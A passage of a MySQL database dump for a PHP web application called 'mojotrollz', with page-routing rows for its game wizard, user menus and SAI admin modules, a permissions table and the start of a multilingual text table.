'./?page=wizard_toolbar&last=start&next=wizard_visuals', 'init_wizard_toolbar', 'wizard_toolbar'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (11, 2, 'user_achievements_menu_sub_1', 'user_achievements_menu_sub_1', -1, 0, 0, '#achievement_content_acc', './?page=user_achievements_menu_sub&menu=1', 'init_user_achievements_menu_sub', 'user_achievements_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (11, 42, 'all', 'api', 10, 0, 0, '#tab_api', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_api&action=list&group=${group}', 'init_saimod_sys_api_list', '\\SYSTEM\\SAI\\saimod_sys_api'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (12, 2, 'user_achievements_menu_sub_2', 'user_achievements_menu_sub_2', -1, 0, 0, '#achievement_content_boss', './?page=user_achievements_menu_sub&menu=2', 'init_user_achievements_menu_sub', 'user_achievements_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (12, 42, 'delete', 'api', 10, 0, 1, '#tab_api', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_api&action=deletedialog&group=${group}&ID=${id}', 'init_saimod_sys_api_delete', '\\SYSTEM\\SAI\\saimod_sys_api'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (13, 2, 'user_achievements_menu_sub_3', 'user_achievements_menu_sub_3', -1, 0, 0, '#achievement_content_pvp', './?page=user_achievements_menu_sub&menu=3', 'init_user_achievements_menu_sub', 'user_achievements_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (13, 42, 'new', 'api', 10, 0, 1, '#tab_api', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_api&action=newdialog', 'init_saimod_sys_api_new', '\\SYSTEM\\SAI\\saimod_sys_api'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (14, 2, 'user_achievements_menu_sub_4', 'user_achievements_menu_sub_4', -1, 0, 0, '#achievement_content_creature', './?page=user_achievements_menu_sub&menu=4', 'init_user_achievements_menu_sub', 'user_achievements_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (15, 2, 'user_achievements_menu_sub_5', 'user_achievements_menu_sub_5', -1, 0, 0, '#achievement_content_quest', './?page=user_achievements_menu_sub&menu=5', 'init_user_achievements_menu_sub', 'user_achievements_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (16, 2, 'user_achievements_menu_sub_6', 'user_achievements_menu_sub_6', -1, 0, 0, '#achievement_content_item', './?page=user_achievements_menu_sub&menu=6', 'init_user_achievements_menu_sub', 'user_achievements_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (17, 2, 'user_achievements_menu_sub_7', 'user_achievements_menu_sub_7', -1, 0, 0, '#achievement_content_eco', './?page=user_achievements_menu_sub&menu=7', 'init_user_achievements_menu_sub', 'user_achievements_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (20, 1, 'wizard_guild', 'wizard_guild', -1, 0, 0, '#frame_content', './?page=wizard_guild', 'init_wizard_guild', 'wizard_guild'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (20, 2, 'user_database', 'user_database', -1, 0, 0, '#frame_content', './?page=user_database', 'init_user_database', 'user_database'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (20, 42, 'cache', 'cache', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cache', 'init_saimod_sys_cache', '\\SYSTEM\\SAI\\saimod_sys_cache'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (21, 1, 'wizard_guild_toolbar', 'wizard_guild', 20, 0, 0, '#frame_content_toolbar', './?page=wizard_toolbar&last=wizard_skills&next=wizard_spawn', 'init_wizard_toolbar', 'wizard_toolbar'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (30, 1, 'wizard_register', 'wizard_register', -1, 0, 0, '#frame_content', './?page=wizard_register', 'init_wizard_register', 'wizard_register'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (30, 2, 'user_news', 'user_news', -1, 0, 0, '#frame_content', './?page=user_start', 'init_user_news', 'user_start'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (30, 42, 'config', 'config', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_config', 'init_saimod_sys_config', '\\SYSTEM\\SAI\\saimod_sys_config'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (31, 42, 'basics', 'config', 30, 0, 0, '#tab_config', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_config&action=basics', 'init_saimod_sys_config_basics', '\\SYSTEM\\SAI\\saimod_sys_config'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (32, 42, 'database', 'config', 30, 0, 1, '#tab_config', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_config&action=database', 'init_saimod_sys_config_database', '\\SYSTEM\\SAI\\saimod_sys_config'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (33, 42, 'sai', 'config', 30, 0, 1, '#tab_config', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_config&action=sai', 'init_saimod_sys_config_sai', '\\SYSTEM\\SAI\\saimod_sys_config'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (40, 1, 'wizard_skills', 'wizard_skills', -1, 0, 0, '#frame_content', './?page=wizard_skills', 'init_wizard_skills', 'wizard_skills'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (40, 2, 'user_nexus_menu', 'user_nexus_menu', -1, 0, 0, '#frame_content', './?page=user_nexus_menu', 'init_user_nexus_menu', 'user_nexus_menu'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (40, 42, 'cron', 'cron', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron', 'init_saimod_sys_cron', '\\SYSTEM\\SAI\\saimod_sys_cron'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (41, 1, 'wizard_skills_toolbar', 'wizard_skills', 40, 0, 0, '#frame_content_toolbar', './?page=wizard_toolbar&last=wizard_visuals&next=wizard_guild', 'init_wizard_toolbar', 'wizard_toolbar'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (41, 2, 'user_nexus_menu_sub_1', 'user_nexus_menu_sub_1', -1, 0, 0, '#nexus_list', './?page=user_nexus_menu_sub&menu=1', 'init_user_nexus_menu_sub', 'user_nexus_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (42, 2, 'user_nexus_menu_sub_2', 'user_nexus_menu_sub_2', -1, 0, 0, '#nexus_list', './?page=user_nexus_menu_sub&menu=2', 'init_user_nexus_menu_sub', 'user_nexus_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (43, 2, 'user_nexus_menu_sub_3', 'user_nexus_menu_sub_3', -1, 0, 0, '#nexus_list', './?page=user_nexus_menu_sub&menu=3', 'init_user_nexus_menu_sub', 'user_nexus_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (44, 2, 'user_nexus_menu_sub_4', 'user_nexus_menu_sub_4', -1, 0, 0, '#nexus_content_guilds', './?page=user_nexus_menu_sub&menu=4', 'init_user_nexus_menu_sub', 'user_nexus_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (45, 2, 'user_nexus_menu_sub_5', 'user_nexus_menu_sub_5', -1, 0, 0, '#nexus_content_topics', './?page=user_nexus_menu_sub&menu=5', 'init_user_nexus_menu_sub', 'user_nexus_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (46, 2, 'user_nexus_menu_sub_5_start', 'user_nexus_menu_sub_5_start', -1, 0, 0, '#nexus_list', './?page=user_nexus_menu_sub&menu=100', 'init_user_nexus_menu_sub', 'user_nexus_menu_sub'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (50, 1, 'wizard_spawn', 'wizard_spawn', -1, 0, 0, '#frame_content', './?page=wizard_spawn', 'init_wizard_spawn', 'wizard_spawn'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (50, 2, 'user_shop_menu', 'user_shop_menu', -1, 0, 0, '#frame_content', './?page=user_shop_menu', 'init_user_shop_menu', 'user_shop_menu'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (50, 42, 'docu', 'docu', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_docu', 'init_saimod_sys_docu', '\\SYSTEM\\SAI\\saimod_sys_docu'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (51, 1, 'wizard_spawn_toolbar', 'wizard_spawn', 50, 0, 0, '#frame_content_toolbar', './?page=wizard_toolbar&last=wizard_guild&next=wizard_summary', 'init_wizard_toolbar', 'wizard_toolbar'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (51, 42, 'cat', 'docu', 50, 0, 0, '#tab_docu', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_docu&action=cat&cat=${cat}', 'init_saimod_sys_docu_cat', '\\SYSTEM\\SAI\\saimod_sys_docu'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (55, 42, 'doc', 'docu', 51, 0, 0, '#tab2_docu', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_docu&action=doc&cat=${cat}&doc=${doc}', 'init_saimod_sys_docu_doc', '\\SYSTEM\\SAI\\saimod_sys_docu'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (60, 1, 'wizard_summary', 'wizard_summary', -1, 0, 0, '#frame_content', './?page=wizard_summary', 'init_wizard_summary', 'wizard_summary'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (60, 2, 'user_start', 'user_start', -1, 0, 0, '#frame_character', './?page=user_character', 'init_user_character', 'user_character'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (60, 42, 'files', 'files', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_files', 'init_saimod_sys_files', '\\SYSTEM\\SAI\\saimod_sys_files'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (61, 1, 'wizard_summary_toolbar', 'wizard_summary', 60, 0, 0, '#frame_content_toolbar', './?page=wizard_toolbar&last=wizard_spawn&next=wizard_register', 'init_wizard_toolbar', 'wizard_toolbar'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (61, 2, 'user_start', 'user_start', -1, 0, 0, '#frame_content', './?page=user_start', 'init_user_start', 'user_start'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (61, 42, 'list', 'files', 60, 0, 0, '#tab_files', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_files&action=tab&name=${folder}', 'init_saimod_sys_files_list', '\\SYSTEM\\SAI\\saimod_sys_files'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (62, 2, 'user_start', 'user_start', -1, 0, 0, '#frame_menu', './?page=user_menu', 'init_user_menu', 'user_menu'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (70, 1, 'wizard_visuals', 'wizard_visuals', -1, 0, 0, '#frame_content', './?page=wizard_visuals', 'init_wizard_visuals', 'wizard_visuals'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (70, 42, 'log', 'log', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log', 'init_saimod_sys_log', '\\SYSTEM\\SAI\\saimod_sys_log'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (71, 1, 'wizard_visuals_toolbar', 'wizard_visuals', 70, 0, 0, '#frame_content_toolbar', './?page=wizard_toolbar&last=wizard_details&next=wizard_skills', 'init_wizard_toolbar', 'wizard_toolbar'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (71, 42, 'list', 'log', 70, 0, 0, '#tab_log', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=filter&filter=${filter}&search=${search}&page=${page}', 'init_saimod_sys_log_log', '\\SYSTEM\\SAI\\saimod_sys_log'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (72, 42, 'stats', 'log', 70, 0, 1, '#tab_log', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats', 'init_saimod_sys_log_stats', '\\SYSTEM\\SAI\\saimod_sys_log'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (73, 42, 'error', 'log', 70, 0, 1, '#tab_log', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=error&error=${error}', '', ''); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (80, 42, 'login', 'login', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_login', 'init_saimod_sys_login', '\\SYSTEM\\SAI\\saimod_sys_login'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (81, 42, 'register', 'login', 80, 0, 1, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_login&action=registerform', 'init_saimod_sys_register', '\\SYSTEM\\SAI\\saimod_sys_login'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (90, 42, 'mod', 'mod', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_mod', 'init_saimod_sys_mod', '\\SYSTEM\\SAI\\saimod_sys_mod'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (91, 42, 'system', 'mod', 90, 0, 0, '#tab_mod', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_mod&action=system', 'init_saimod_sys_mod_system', '\\SYSTEM\\SAI\\saimod_sys_mod'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (92, 42, 'project', 'mod', 90, 0, 1, '#tab_mod', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_mod&action=project', 'init_saimod_sys_mod_project', '\\SYSTEM\\SAI\\saimod_sys_mod'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (93, 42, 'lib', 'mod', 90, 0, 1, '#tab_mod', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_mod&action=lib', 'init_saimod_sys_mod_lib', '\\SYSTEM\\SAI\\saimod_sys_mod'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (100, 42, 'security', 'security', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_security', 'init_saimod_sys_security', '\\SYSTEM\\SAI\\saimod_sys_security'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (101, 42, 'users', 'security', 100, 0, 0, '#tab_security', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_security&action=users&filter=${filter}&search=${search}&page=${page}', 'init_saimod_sys_security_users', '\\SYSTEM\\SAI\\saimod_sys_security'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (102, 42, 'rights', 'security', 100, 0, 1, '#tab_security', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_security&action=rights', 'init_saimod_sys_security_rights', '\\SYSTEM\\SAI\\saimod_sys_security'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (103, 42, 'user', 'security', 100, 0, 1, '#tab_security', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_security&action=user&username=${username}', 'init_saimod_sys_security_user', '\\SYSTEM\\SAI\\saimod_sys_security'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (104, 42, 'newright', 'security', 100, 0, 1, '#tab_security', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_security&action=newright', 'init_saimod_sys_security_newright', '\\SYSTEM\\SAI\\saimod_sys_security'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (105, 42, 'delright', 'security', 100, 0, 1, '#tab_security', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_security&action=deleterightconfirm&id=${id}', 'init_saimod_sys_security_delright', '\\SYSTEM\\SAI\\saimod_sys_security'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (110, 42, 'text', 'text', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_text', 'init_saimod_sys_text', '\\SYSTEM\\SAI\\saimod_sys_text'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (111, 42, 'tag', 'text', 110, 0, 0, '#tab_content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_text&action=tag&tag=${tag}&filter=${filter}&search=${search}&page=${page}', 'init_saimod_sys_text_tag', '\\SYSTEM\\SAI\\saimod_sys_text'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (115, 42, 'edittext', 'text', 110, 0, 1, '#tab_content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_text&action=edittext&id=${id}&lang=${lang}', '', ''); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (116, 42, 'editor', 'text', 115, 0, 1, '#tab_editor', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_text&action=editor&id=${id}&lang=${lang}', 'init_saimod_sys_text_editor', '\\SYSTEM\\SAI\\saimod_sys_text'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (120, 42, 'todo', 'todo', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo', 'init_saimod_sys_todo', '\\SYSTEM\\SAI\\saimod_sys_todo'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (121, 42, 'todolist', 'todo', 120, 0, 0, '#tab_todo', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=todolist&filter=${filter}&search=${search}&page=${page}', 'init_saimod_sys_todo_todo', '\\SYSTEM\\SAI\\saimod_sys_todo'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (122, 42, 'doto', 'todo', 120, 0, 1, '#tab_todo', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=dotolist&filter=${filter}&search=${search}&page=${page}', 'init_saimod_sys_todo_doto', '\\SYSTEM\\SAI\\saimod_sys_todo'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (123, 42, 'stats', 'todo', 120, 0, 1, '#tab_todo', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=stats', 'init_saimod_sys_todo_stats', '\\SYSTEM\\SAI\\saimod_sys_todo'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (124, 42, 'todoopen', 'todo', 120, 0, 1, '#tab_todo', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=todo&todo=${todo}', 'init_saimod_sys_todo_todoopen', '\\SYSTEM\\SAI\\saimod_sys_todo'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (125, 42, 'todoclose', 'todo', 120, 0, 1, '#tab_todo', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=todo&todo=${todo}', 'init_saimod_sys_todo_todoclose', '\\SYSTEM\\SAI\\saimod_sys_todo'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (126, 42, 'new', 'todo', 120, 0, 1, '#tab_todo', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=new', 'init_saimod_sys_todo_new', '\\SYSTEM\\SAI\\saimod_sys_todo'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (130, 42, 'page', 'page', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_page', 'init_saimod_sys_page', '\\SYSTEM\\SAI\\saimod_sys_page'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (131, 42, 'all', 'page', 130, 0, 0, '#tab_page', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_page&action=list&group=${group}', 'init_saimod_sys_page_list', '\\SYSTEM\\SAI\\saimod_sys_page'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (132, 42, 'delete', 'page', 130, 0, 1, '#tab_page', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_page&action=deletedialog&group=${group}&ID=${id}', 'init_saimod_sys_page_delete', '\\SYSTEM\\SAI\\saimod_sys_page'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (133, 42, 'new', 'page', 130, 0, 1, '#tab_page', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_page&action=newdialog', 'init_saimod_sys_page_new', '\\SYSTEM\\SAI\\saimod_sys_page'); INSERT INTO `system_page` (`id`, `group`, `name`, `state`, `parent_id`, `login`, `type`, `div`, `url`, `func`, `php_class`) VALUES (140, 42, 'git', 'git', -1, 0, 0, '#content', './sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_git', 'init_saimod_sys_git', '\\SYSTEM\\SAI\\saimod_sys_git'); /*!40000 ALTER TABLE `system_page` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_rights CREATE TABLE IF NOT EXISTS `system_rights` ( `ID` int(10) NOT NULL AUTO_INCREMENT, `name` char(50) NOT NULL, `description` char(255) NOT NULL, PRIMARY KEY (`ID`) ) ENGINE=MyISAM AUTO_INCREMENT=26 DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_rights: 8 rows /*!40000 ALTER TABLE `system_rights` DISABLE KEYS */; INSERT INTO `system_rights` (`ID`, `name`, `description`) VALUES (10, 'SYS_SAI_LOCALE', 'Allows access to the Locale Module in SAI to edit or add Multilanguage Text'); INSERT INTO `system_rights` (`ID`, `name`, `description`) VALUES (6, 'SYS_SAI_SECURITY_RIGHTS_EDIT', 'Allows deleting, editing and adding of Right in the SAI module Security'); INSERT INTO `system_rights` (`ID`, `name`, `description`) VALUES (5, 'SYS_SAI_SECURITY', 'Allows access to the Security Module in SAI'); INSERT INTO `system_rights` (`ID`, `name`, `description`) VALUES (1, 'SYS_SAI', 'SAI access right'); INSERT INTO `system_rights` (`ID`, `name`, `description`) VALUES (15, 'SYS_SAI_IMG', 'Allows access to the Image Module in SAI to delete or add Pictures'); INSERT INTO `system_rights` (`ID`, `name`, `description`) VALUES (20, 'SYS_SAI_API', 'SAI API Access right'); INSERT INTO `system_rights` (`ID`, `name`, `description`) VALUES (21, 'SYS_SAI_API_EDIT', 'SAI API Edit right'); INSERT INTO `system_rights` (`ID`, `name`, `description`) VALUES (25, 'SYS_SAI_CRON', 'SAI Cron Access right'); /*!40000 ALTER TABLE `system_rights` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_text CREATE TABLE IF NOT EXISTS `system_text` ( `id` char(35) NOT NULL, `lang` char(4) NOT NULL, `text` text NOT NULL, `author` int(10) unsigned NOT NULL, `author_edit` int(10) unsigned NOT NULL, `time_create` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `time_edit` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`id`,`lang`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Shall hold strings and its translation'; -- Exportiere Daten aus Tabelle host_mojotrollz.system_text: ~613 rows (ungefähr) /*!40000 ALTER TABLE `system_text` DISABLE KEYS */; INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_add', 'deDE', 'Hinzufügen', 2, 2, '2015-04-20 01:45:18', '2015-04-20 01:45:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_add', 'enUS', 'Add', 2, 2, '2015-04-18 13:25:30', '2015-04-18 13:25:30'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_add', 'frFR', 'Ajouter', 3, 3, '2015-04-20 16:31:35', '2015-04-20 16:31:35'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_add_right', 'deDE', 'Recht hinzufügen', 1, 1, '2015-04-16 23:11:18', '2015-04-16 16:48:36'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_add_right', 'enUS', 'Add Right', 2, 1, '2015-04-16 23:11:18', '2015-04-16 23:11:18'); INSERT INTO `system_text` (`id`, `lang`, `text`, `author`, `author_edit`, `time_create`, `time_edit`) VALUES ('basic_admin_rights', 